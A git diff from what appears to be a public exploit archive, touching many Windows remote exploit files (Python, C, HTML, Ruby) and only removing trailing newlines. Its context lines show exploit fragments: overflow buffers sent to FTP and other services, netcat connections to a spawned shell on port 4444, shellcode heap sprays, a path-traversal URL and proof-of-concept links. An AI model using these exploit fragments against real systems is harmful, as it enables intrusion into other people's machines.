a/platforms/windows/remote/4027.py b/platforms/windows/remote/4027.py index 9bd571d6c..198bdfb96 100755 --- a/platforms/windows/remote/4027.py +++ b/platforms/windows/remote/4027.py @@ -104,4 +104,4 @@ print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell" print "[*] Happy Hunting!" expl.close() -# milw0rm.com [2007-06-03] +# milw0rm.com [2007-06-03] \ No newline at end of file diff --git a/platforms/windows/remote/40279.py b/platforms/windows/remote/40279.py index b1c53241e..4c9edda07 100755 --- a/platforms/windows/remote/40279.py +++ b/platforms/windows/remote/40279.py @@ -210,4 +210,4 @@ if __name__ == '__main__': current = SRVSVC_Exploit(target, os) -current.start() +current.start() \ No newline at end of file diff --git a/platforms/windows/remote/40280.py b/platforms/windows/remote/40280.py index 5cad3cb5b..a1f2defc9 100755 --- a/platforms/windows/remote/40280.py +++ b/platforms/windows/remote/40280.py @@ -107,4 +107,4 @@ s.connect(host) s.send(buff) s.close() #Trigger the above injected code via authenticated process. -subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True) +subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True) \ No newline at end of file diff --git a/platforms/windows/remote/4042.html b/platforms/windows/remote/4042.html index 58651d1fb..c7fa24133 100755 --- a/platforms/windows/remote/4042.html +++ b/platforms/windows/remote/4042.html @@ -41,4 +41,4 @@ target.send(); sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111 -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/windows/remote/4043.html b/platforms/windows/remote/4043.html index 2080b03e2..5b88ba12e 100755 --- a/platforms/windows/remote/4043.html +++ b/platforms/windows/remote/4043.html @@ -37,4 +37,4 @@ target.receive(); -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/windows/remote/40445.txt b/platforms/windows/remote/40445.txt index 57e7d5f36..b2dcac62b 100755 --- a/platforms/windows/remote/40445.txt +++ b/platforms/windows/remote/40445.txt @@ -49,5 +49,4 @@ evil = 'A' * 300 s.recv(1024) s.send(evil) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4045.py b/platforms/windows/remote/4045.py index 656c362d2..e719ec214 100755 --- a/platforms/windows/remote/4045.py +++ b/platforms/windows/remote/4045.py @@ -289,4 +289,4 @@ if __name__ == '__main__': except: pass -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/windows/remote/40452.py b/platforms/windows/remote/40452.py index e5f96d630..a4315996c 100755 --- a/platforms/windows/remote/40452.py +++ b/platforms/windows/remote/40452.py @@ -89,5 +89,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40455.py b/platforms/windows/remote/40455.py index c9c729f81..1ddfa06f3 100755 --- a/platforms/windows/remote/40455.py +++ b/platforms/windows/remote/40455.py @@ -88,6 +88,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40456.py b/platforms/windows/remote/40456.py index 0b7430373..d2bdd989f 100755 --- a/platforms/windows/remote/40456.py +++ b/platforms/windows/remote/40456.py @@ -88,6 +88,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40457.py b/platforms/windows/remote/40457.py index 6c25eb807..e4fe1869f 100755 --- a/platforms/windows/remote/40457.py +++ b/platforms/windows/remote/40457.py @@ -88,6 +88,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40458.py b/platforms/windows/remote/40458.py index 8235ece09..37d39ca11 100755 --- a/platforms/windows/remote/40458.py +++ b/platforms/windows/remote/40458.py @@ -88,6 +88,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40459.py b/platforms/windows/remote/40459.py index 8a4b67c06..310854e69 100755 --- a/platforms/windows/remote/40459.py +++ b/platforms/windows/remote/40459.py @@ -88,6 +88,4 @@ evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4049.html b/platforms/windows/remote/4049.html index ecc372063..1a2d946e0 100755 --- a/platforms/windows/remote/4049.html +++ b/platforms/windows/remote/4049.html @@ -50,4 +50,4 @@ -# milw0rm.com [2007-06-08] +# milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/windows/remote/4050.html b/platforms/windows/remote/4050.html index 14d95a29f..924989e51 100755 --- a/platforms/windows/remote/4050.html +++ b/platforms/windows/remote/4050.html @@ -35,4 +35,4 @@ End Sub -# milw0rm.com [2007-06-08] +# milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/windows/remote/4052.c b/platforms/windows/remote/4052.c index b54ca9ed0..978726009 100755 --- a/platforms/windows/remote/4052.c +++ b/platforms/windows/remote/4052.c @@ -141,4 +141,4 @@ printf("[+] exploit write to %s success!\n", file); // =-Excepti0n-= -// milw0rm.com [2007-06-08] +// milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/windows/remote/4053.c b/platforms/windows/remote/4053.c index 5f78194c7..49eb3172c 100755 --- a/platforms/windows/remote/4053.c +++ b/platforms/windows/remote/4053.c @@ -142,4 +142,4 @@ printf("[+] exploit write to %s success!\n", file); // =-Excepti0n-= -// milw0rm.com [2007-06-08] +// milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/windows/remote/4060.html b/platforms/windows/remote/4060.html index f1eaf40a7..eac1167f3 100755 --- a/platforms/windows/remote/4060.html +++ b/platforms/windows/remote/4060.html @@ -41,4 +41,4 @@ -# milw0rm.com [2007-06-12] +# milw0rm.com [2007-06-12] \ No newline at end of file diff --git a/platforms/windows/remote/4061.html b/platforms/windows/remote/4061.html index 350fee546..30fb90621 100755 --- a/platforms/windows/remote/4061.html +++ b/platforms/windows/remote/4061.html @@ -27,4 +27,4 @@ Cheers Thor Larholm process.init(file);process.run(true,{},0);alert(process) -# milw0rm.com [2007-06-12] +# milw0rm.com [2007-06-12] \ No newline at end of file diff --git a/platforms/windows/remote/4065.html b/platforms/windows/remote/4065.html index b84e0c6e5..5f31a0378 100755 --- a/platforms/windows/remote/4065.html +++ b/platforms/windows/remote/4065.html @@ -106,4 +106,4 @@ DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/windows/remote/4066.html b/platforms/windows/remote/4066.html index 6b7681283..14b979f1d 100755 --- a/platforms/windows/remote/4066.html +++ b/platforms/windows/remote/4066.html @@ -78,4 +78,4 @@ DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/windows/remote/40670.py b/platforms/windows/remote/40670.py index 60592f98c..5eb2d5f7f 100755 --- a/platforms/windows/remote/40670.py +++ b/platforms/windows/remote/40670.py @@ -41,5 +41,4 @@ print ftp.login print ''' Successfull Exploitation! ''' -FTP.delete(ftp, remotecode) - +FTP.delete(ftp, remotecode) \ No newline at end of file diff --git a/platforms/windows/remote/40672.py b/platforms/windows/remote/40672.py index 8e69cf8e3..6eb12fb9a 100755 --- a/platforms/windows/remote/40672.py +++ b/platforms/windows/remote/40672.py @@ -55,9 +55,4 @@ s.recv(1024) s.send('PASS free\r\n') s.recv(1024) s.send('RMD' + buffer1 + '\r\n') -s.close() - - - - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40673.py b/platforms/windows/remote/40673.py index 8ad9c6a15..a53328940 100755 --- a/platforms/windows/remote/40673.py +++ b/platforms/windows/remote/40673.py @@ -57,5 +57,4 @@ s.send('PASS test \r\n') s.recv(1024) s.send('HOST' +buffer+ '\r\n') s.close() -print "Attack Buffer Overflow Successfully Executed" - +print "Attack Buffer Overflow Successfully Executed" \ No newline at end of file diff --git a/platforms/windows/remote/40674.py b/platforms/windows/remote/40674.py index 7a8002669..73cd8775f 100755 --- a/platforms/windows/remote/40674.py +++ b/platforms/windows/remote/40674.py @@ -52,4 +52,4 @@ s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('ABOR' + buffer1 + '\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40677.py b/platforms/windows/remote/40677.py index 8d37c9416..87e967d3b 100755 --- a/platforms/windows/remote/40677.py +++ b/platforms/windows/remote/40677.py @@ -56,5 +56,4 @@ s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('RENAME' + buffer +'\r\n') -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40680.py b/platforms/windows/remote/40680.py index cdf9f1002..f924275eb 100755 --- a/platforms/windows/remote/40680.py +++ b/platforms/windows/remote/40680.py @@ -50,7 +50,4 @@ s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('UMASK' + buffer +'\r\n') -s.close() - - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40681.py b/platforms/windows/remote/40681.py index cb9be6753..7952a134c 100755 --- a/platforms/windows/remote/40681.py +++ b/platforms/windows/remote/40681.py @@ -52,4 +52,4 @@ Successfull Exploitation! message = 'dir ' + remotecode s.send(message) s.recv(1024) -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/40704.py b/platforms/windows/remote/40704.py index 9b3f5aba6..231ac5cd3 100755 --- a/platforms/windows/remote/40704.py +++ b/platforms/windows/remote/40704.py @@ -57,5 +57,4 @@ s.recv(1024) s.send('ACCT' +buffer+ '\r\n') s.close() -print "Attack Buffer Overflow Successfully Executed" - +print "Attack Buffer Overflow Successfully Executed" \ No newline at end of file diff --git a/platforms/windows/remote/40712.py b/platforms/windows/remote/40712.py index 1350c1e0a..f5bf2e266 100755 --- a/platforms/windows/remote/40712.py +++ b/platforms/windows/remote/40712.py @@ -55,4 +55,4 @@ s.recv(1024) s.send('PASS \r\n') s.recv(1024) s.send('NLST' + buffer1 + '\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40714.py b/platforms/windows/remote/40714.py index f6fa1a9e8..ccada30cb 100755 --- a/platforms/windows/remote/40714.py +++ b/platforms/windows/remote/40714.py @@ -70,5 +70,4 @@ s.close() # ... # Got it! -print "Got it? :D" - +print "Got it? :D" \ No newline at end of file diff --git a/platforms/windows/remote/40715.py b/platforms/windows/remote/40715.py index 7cc5650f7..5a76e098f 100755 --- a/platforms/windows/remote/40715.py +++ b/platforms/windows/remote/40715.py @@ -55,4 +55,4 @@ Successfull Exploitation! message = 'RETR ' + remotecode s.send(message) s.recv(1024) -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/40721.html b/platforms/windows/remote/40721.html index f87c619a1..0e565f01a 100755 --- a/platforms/windows/remote/40721.html +++ b/platforms/windows/remote/40721.html @@ -217,4 +217,4 @@ November 2016: Details of this issue are released. End Sub - + \ No newline at end of file diff --git a/platforms/windows/remote/40760.rb b/platforms/windows/remote/40760.rb index cea03f2dc..6c4b6a231 100755 --- a/platforms/windows/remote/40760.rb +++ b/platforms/windows/remote/40760.rb @@ -284,5 +284,4 @@ end end end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/40778.py b/platforms/windows/remote/40778.py index 85ce72eb7..c974fb0a4 100755 --- a/platforms/windows/remote/40778.py +++ b/platforms/windows/remote/40778.py @@ -110,4 +110,4 @@ else: usage() exploit(target_eip) except: - print "\n[O_o] KTHXBYE! [O_o]" + print "\n[O_o] KTHXBYE! [O_o]" \ No newline at end of file diff --git a/platforms/windows/remote/40830.py b/platforms/windows/remote/40830.py index 271ce07c0..01598cfc0 100755 --- a/platforms/windows/remote/40830.py +++ b/platforms/windows/remote/40830.py @@ -95,6 +95,4 @@ evil += "\x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40831.py b/platforms/windows/remote/40831.py index 06558e545..89c529a08 100755 --- a/platforms/windows/remote/40831.py +++ b/platforms/windows/remote/40831.py @@ -95,6 +95,4 @@ evil += "\x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40832.py b/platforms/windows/remote/40832.py index 97e4cf5c8..edddc27e9 100755 --- a/platforms/windows/remote/40832.py +++ b/platforms/windows/remote/40832.py @@ -95,6 +95,4 @@ evil += "\x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40833.py b/platforms/windows/remote/40833.py index 70244d20f..6bd61cd6b 100755 --- a/platforms/windows/remote/40833.py +++ b/platforms/windows/remote/40833.py @@ -95,6 +95,4 @@ evil += "\x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40834.py b/platforms/windows/remote/40834.py index c4d82e98e..80fb45d98 100755 --- a/platforms/windows/remote/40834.py +++ b/platforms/windows/remote/40834.py @@ -95,6 +95,4 @@ evil += "\x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40835.py b/platforms/windows/remote/40835.py index 6b7d3bb4d..f177d2c74 100755 --- a/platforms/windows/remote/40835.py +++ b/platforms/windows/remote/40835.py @@ -95,6 +95,4 @@ evil += \"\\x90\" * 8672 print \'Sending evil buffer...\' s.send(evil) print \'Payload Sent!\' -s.close() - - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/40854.py b/platforms/windows/remote/40854.py index e755b9ac3..e3796120f 100755 --- a/platforms/windows/remote/40854.py +++ b/platforms/windows/remote/40854.py @@ -73,4 +73,4 @@ s.close() print "Waiting for shell..." time.sleep(5) -os.system("nc " + host + " 4444") +os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/platforms/windows/remote/40862.py b/platforms/windows/remote/40862.py index a9440b738..ddf73d265 100755 --- a/platforms/windows/remote/40862.py +++ b/platforms/windows/remote/40862.py @@ -238,4 +238,4 @@ canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectk ###phase6 - delete the jobset -deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000" +deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000" \ No newline at end of file diff --git a/platforms/windows/remote/40868.py b/platforms/windows/remote/40868.py index 4037db708..0d54e0be7 100755 --- a/platforms/windows/remote/40868.py +++ b/platforms/windows/remote/40868.py @@ -75,4 +75,4 @@ buffer += align + "\x44"*(1000-len(align)) file = open('boom.txt','w') file.write(buffer) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/remote/40869.py b/platforms/windows/remote/40869.py index db61a8fff..7bd8380c9 100755 --- a/platforms/windows/remote/40869.py +++ b/platforms/windows/remote/40869.py @@ -64,4 +64,4 @@ s.close() print "Waiting for shell..." time.sleep(5) -os.system("nc " + host + " 4444") +os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/platforms/windows/remote/4094.html b/platforms/windows/remote/4094.html index b90d5e77f..9245f2ef4 100755 --- a/platforms/windows/remote/4094.html +++ b/platforms/windows/remote/4094.html @@ -170,4 +170,4 @@ End Sub -# milw0rm.com [2007-06-22] +# milw0rm.com [2007-06-22] \ No newline at end of file diff --git a/platforms/windows/remote/40984.py b/platforms/windows/remote/40984.py index e974f075f..2ed5c05ad 100755 --- a/platforms/windows/remote/40984.py +++ b/platforms/windows/remote/40984.py @@ -158,4 +158,4 @@ if __name__ == "__main__": print "[*] Listening for FTP Data." # Making the main thread wait. print "[*] To exit the script please press any key at any time." - raw_input() + raw_input() \ No newline at end of file diff --git a/platforms/windows/remote/41003.py b/platforms/windows/remote/41003.py index 613d522b8..17d4769d8 100755 --- a/platforms/windows/remote/41003.py +++ b/platforms/windows/remote/41003.py @@ -63,4 +63,4 @@ buffer = ( s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(buffer) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4101.html b/platforms/windows/remote/4101.html index 50d267bcf..6bd036ecd 100755 --- a/platforms/windows/remote/4101.html +++ b/platforms/windows/remote/4101.html @@ -49,4 +49,4 @@ -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/windows/remote/41073.py b/platforms/windows/remote/41073.py index 67a604562..14f6b7ed6 100755 --- a/platforms/windows/remote/41073.py +++ b/platforms/windows/remote/41073.py @@ -60,5 +60,4 @@ while True: - - + \ No newline at end of file diff --git a/platforms/windows/remote/4109.html b/platforms/windows/remote/4109.html index 7872a5632..cdc015656 100755 --- a/platforms/windows/remote/4109.html +++ b/platforms/windows/remote/4109.html @@ -41,4 +41,4 @@ -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/windows/remote/4110.html b/platforms/windows/remote/4110.html index 31ff3378f..be59f5f65 100755 --- a/platforms/windows/remote/4110.html +++ b/platforms/windows/remote/4110.html @@ -77,4 +77,4 @@ sub Boom() -# milw0rm.com [2007-06-26] +# milw0rm.com [2007-06-26] \ No newline at end of file diff --git a/platforms/windows/remote/41148.html b/platforms/windows/remote/41148.html index 187fff0d4..7c01367bc 100755 --- a/platforms/windows/remote/41148.html +++ b/platforms/windows/remote/41148.html @@ -152,4 +152,4 @@ function runcode()

    Running exploit...

    - + \ No newline at end of file diff --git a/platforms/windows/remote/41160.py b/platforms/windows/remote/41160.py index 37ac52768..df8c156ae 100755 --- a/platforms/windows/remote/41160.py +++ b/platforms/windows/remote/41160.py @@ -87,4 +87,4 @@ def main(): if __name__ == '__main__': try: sys.exit(main()) except KeyboardInterrupt: - callExit() + callExit() \ No newline at end of file diff --git a/platforms/windows/remote/4119.html b/platforms/windows/remote/4119.html index 76f62d4f0..f07a72c83 100755 --- a/platforms/windows/remote/4119.html +++ b/platforms/windows/remote/4119.html @@ -76,4 +76,4 @@ End Sub -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/windows/remote/4123.html b/platforms/windows/remote/4123.html index f8b5c9672..9f60afdb9 100755 --- a/platforms/windows/remote/4123.html +++ b/platforms/windows/remote/4123.html @@ -57,4 +57,4 @@ AmxVnc.Password = suntzu -# milw0rm.com [2007-06-28] +# milw0rm.com [2007-06-28] \ No newline at end of file diff --git a/platforms/windows/remote/4143.html b/platforms/windows/remote/4143.html index f659cae03..27a5ae13c 100755 --- a/platforms/windows/remote/4143.html +++ b/platforms/windows/remote/4143.html @@ -60,4 +60,4 @@ End Sub -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/windows/remote/41436.py b/platforms/windows/remote/41436.py index 8c440a3fa..020fb0fd9 100755 --- a/platforms/windows/remote/41436.py +++ b/platforms/windows/remote/41436.py @@ -94,5 +94,4 @@ buffer+="Content-Length: 5900\r\n\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) s.send(buffer) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4146.cpp b/platforms/windows/remote/4146.cpp index 4fc8538c4..dc3d1f9d8 100755 --- a/platforms/windows/remote/4146.cpp +++ b/platforms/windows/remote/4146.cpp @@ -790,4 +790,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2007-07-03] +// milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/windows/remote/41479.py b/platforms/windows/remote/41479.py index c24f8fad3..33ba0a749 100755 --- a/platforms/windows/remote/41479.py +++ b/platforms/windows/remote/41479.py @@ -65,5 +65,4 @@ while True: conn, addr = s.accept() conn.send('220 '+buffer+'ESMTP Sendmail \r\n') conn.close() - - + \ No newline at end of file diff --git a/platforms/windows/remote/41511.py b/platforms/windows/remote/41511.py index 3afd7a606..1898c5115 100755 --- a/platforms/windows/remote/41511.py +++ b/platforms/windows/remote/41511.py @@ -65,4 +65,4 @@ while True: print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) - conn.send('220 "'+buffer+'" is current directory\r\n') + conn.send('220 "'+buffer+'" is current directory\r\n') \ No newline at end of file diff --git a/platforms/windows/remote/4152.py b/platforms/windows/remote/4152.py index 6e5c36188..342526002 100755 --- a/platforms/windows/remote/4152.py +++ b/platforms/windows/remote/4152.py @@ -142,4 +142,4 @@ InitServer(in_addr, in_port) # EoF -# milw0rm.com [2007-07-06] +# milw0rm.com [2007-07-06] \ No newline at end of file diff --git a/platforms/windows/remote/41545.py b/platforms/windows/remote/41545.py index 7bd1034bf..21b49db9f 100755 --- a/platforms/windows/remote/41545.py +++ b/platforms/windows/remote/41545.py @@ -65,5 +65,4 @@ while True: conn, addr = s.accept() conn.send('220 '+buffer+'\r\n') conn.close() - - + \ No newline at end of file diff --git a/platforms/windows/remote/4155.html b/platforms/windows/remote/4155.html index 1441e1191..faa62deef 100755 --- a/platforms/windows/remote/4155.html +++ b/platforms/windows/remote/4155.html @@ -34,4 +34,4 @@ -# milw0rm.com [2007-07-06] +# milw0rm.com [2007-07-06] \ No newline at end of file diff --git a/platforms/windows/remote/4157.cpp b/platforms/windows/remote/4157.cpp index fb15cc01c..981d2d971 100755 --- a/platforms/windows/remote/4157.cpp +++ b/platforms/windows/remote/4157.cpp @@ -463,4 +463,4 @@ void end_logo() printf(" ####################################################################### \n\n"); } -// milw0rm.com [2007-07-07] +// milw0rm.com [2007-07-07] \ No newline at end of file diff --git a/platforms/windows/remote/4158.html b/platforms/windows/remote/4158.html index a4218333d..bd434220b 100755 --- a/platforms/windows/remote/4158.html +++ b/platforms/windows/remote/4158.html @@ -126,4 +126,4 @@ Greetz to: Crypkey, alt3kx, zonartm.org, dex, Optix, Nahual, ran. -# milw0rm.com [2007-07-07] +# milw0rm.com [2007-07-07] \ No newline at end of file diff --git a/platforms/windows/remote/4160.html b/platforms/windows/remote/4160.html index 5aae0ace1..c398dcde1 100755 --- a/platforms/windows/remote/4160.html +++ b/platforms/windows/remote/4160.html @@ -35,4 +35,4 @@ -# milw0rm.com [2007-07-07] +# milw0rm.com [2007-07-07] \ No newline at end of file diff --git a/platforms/windows/remote/41638.txt b/platforms/windows/remote/41638.txt index fa8378354..9e82ea49f 100755 --- a/platforms/windows/remote/41638.txt +++ b/platforms/windows/remote/41638.txt @@ -11,5 +11,4 @@ within the context of the web server. Example: Assuming the root folder is c:\\ -http:///..%5c..%5c/windows/win.ini - +http:///..%5c..%5c/windows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/41666.py b/platforms/windows/remote/41666.py index ecd58b616..3b51968fd 100755 --- a/platforms/windows/remote/41666.py +++ b/platforms/windows/remote/41666.py @@ -82,4 +82,4 @@ socket.close() print "Waiting for shell..." time.sleep(10) -os.system("nc " + host + " 4444") +os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/platforms/windows/remote/4170.html b/platforms/windows/remote/4170.html index 921874723..fa85d6f93 100755 --- a/platforms/windows/remote/4170.html +++ b/platforms/windows/remote/4170.html @@ -116,4 +116,4 @@ var payLoadCode=unescape( -# milw0rm.com [2007-07-10] +# milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/windows/remote/4176.html b/platforms/windows/remote/4176.html index 25f5126cd..515a46988 100755 --- a/platforms/windows/remote/4176.html +++ b/platforms/windows/remote/4176.html @@ -74,4 +74,4 @@ function Poc() -# milw0rm.com [2007-07-12] +# milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/platforms/windows/remote/4177.html b/platforms/windows/remote/4177.html index 87d3ff3b0..c942f05e3 100755 --- a/platforms/windows/remote/4177.html +++ b/platforms/windows/remote/4177.html @@ -140,4 +140,4 @@ var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u000 -# milw0rm.com [2007-07-12] +# milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/platforms/windows/remote/418.c b/platforms/windows/remote/418.c index f60fb20d4..69e1be3ae 100755 --- a/platforms/windows/remote/418.c +++ b/platforms/windows/remote/418.c @@ -90,4 +90,4 @@ foo.wsz (foo.zip) --> -// milw0rm.com [2004-08-25] +// milw0rm.com [2004-08-25] \ No newline at end of file diff --git a/platforms/windows/remote/4188.txt b/platforms/windows/remote/4188.txt index 9e923456c..b54363d7e 100755 --- a/platforms/windows/remote/4188.txt +++ b/platforms/windows/remote/4188.txt @@ -4,4 +4,4 @@ http://www.ph4nt0m.org poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) -# milw0rm.com [2007-07-16] +# milw0rm.com [2007-07-16] \ No newline at end of file diff --git a/platforms/windows/remote/41894.py b/platforms/windows/remote/41894.py index 2b0e1bf6b..e8c39719e 100755 --- a/platforms/windows/remote/41894.py +++ b/platforms/windows/remote/41894.py @@ -302,4 +302,4 @@ def server_thread(conn, client_addr): except socket.error, ex: print ex if __name__ == '__main__': - main(sys.argv[1:]) + main(sys.argv[1:]) \ No newline at end of file diff --git a/platforms/windows/remote/4190.html b/platforms/windows/remote/4190.html index 00b1bde8e..b64b29eab 100755 --- a/platforms/windows/remote/4190.html +++ b/platforms/windows/remote/4190.html @@ -54,4 +54,4 @@ -# milw0rm.com [2007-07-17] +# milw0rm.com [2007-07-17] \ No newline at end of file diff --git a/platforms/windows/remote/41903.txt b/platforms/windows/remote/41903.txt index 6cfec6f0d..9b5aa13dd 100755 --- a/platforms/windows/remote/41903.txt +++ b/platforms/windows/remote/41903.txt @@ -42,5 +42,4 @@ A copy of CMD and Notepad is executed on the server in the context of the callin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41903.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41903.zip \ No newline at end of file diff --git a/platforms/windows/remote/41975.txt b/platforms/windows/remote/41975.txt index 34f1a2b8d..a196aedb4 100755 --- a/platforms/windows/remote/41975.txt +++ b/platforms/windows/remote/41975.txt @@ -126,4 +126,4 @@ We have verified that on Windows 10, adding a blanket exception for C:\ is enoug Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41975.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41975.zip \ No newline at end of file diff --git a/platforms/windows/remote/41992.rb b/platforms/windows/remote/41992.rb index d3dd8ef88..590ade73e 100755 --- a/platforms/windows/remote/41992.rb +++ b/platforms/windows/remote/41992.rb @@ -175,4 +175,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42.c b/platforms/windows/remote/42.c index bc4e9d10e..5b96149a7 100755 --- a/platforms/windows/remote/42.c +++ b/platforms/windows/remote/42.c @@ -188,4 +188,4 @@ D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log" */ -// milw0rm.com [2003-06-11] +// milw0rm.com [2003-06-11] \ No newline at end of file diff --git a/platforms/windows/remote/4200.html b/platforms/windows/remote/4200.html index 5d00ea63f..5d99adb99 100755 --- a/platforms/windows/remote/4200.html +++ b/platforms/windows/remote/4200.html @@ -75,4 +75,4 @@ -# milw0rm.com [2007-07-19] +# milw0rm.com [2007-07-19] \ No newline at end of file diff --git a/platforms/windows/remote/42011.py b/platforms/windows/remote/42011.py index 43c629d72..96e20fe17 100755 --- a/platforms/windows/remote/42011.py +++ b/platforms/windows/remote/42011.py @@ -73,4 +73,4 @@ while True: print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) - conn.send('220 "'+buffer+'" is current directory\r\n') + conn.send('220 "'+buffer+'" is current directory\r\n') \ No newline at end of file diff --git a/platforms/windows/remote/4207.py b/platforms/windows/remote/4207.py index c04910e1a..c9dd5cfa1 100755 --- a/platforms/windows/remote/4207.py +++ b/platforms/windows/remote/4207.py @@ -172,4 +172,4 @@ def main(argv=None): if __name__ == '__main__': main() -# milw0rm.com [2007-07-20] +# milw0rm.com [2007-07-20] \ No newline at end of file diff --git a/platforms/windows/remote/4208.html b/platforms/windows/remote/4208.html index eb779e8e0..f0610885c 100755 --- a/platforms/windows/remote/4208.html +++ b/platforms/windows/remote/4208.html @@ -36,4 +36,4 @@ -# milw0rm.com [2007-07-21] +# milw0rm.com [2007-07-21] \ No newline at end of file diff --git a/platforms/windows/remote/421.c b/platforms/windows/remote/421.c index 6b9d8f0b0..442c2c9ec 100755 --- a/platforms/windows/remote/421.c +++ b/platforms/windows/remote/421.c @@ -442,4 +442,4 @@ shell(sock); return 0; } -// milw0rm.com [2004-08-27] +// milw0rm.com [2004-08-27] \ No newline at end of file diff --git a/platforms/windows/remote/4214.html b/platforms/windows/remote/4214.html index 190508263..2bb2ef69e 100755 --- a/platforms/windows/remote/4214.html +++ b/platforms/windows/remote/4214.html @@ -74,4 +74,4 @@ -# milw0rm.com [2007-07-23] +# milw0rm.com [2007-07-23] \ No newline at end of file diff --git 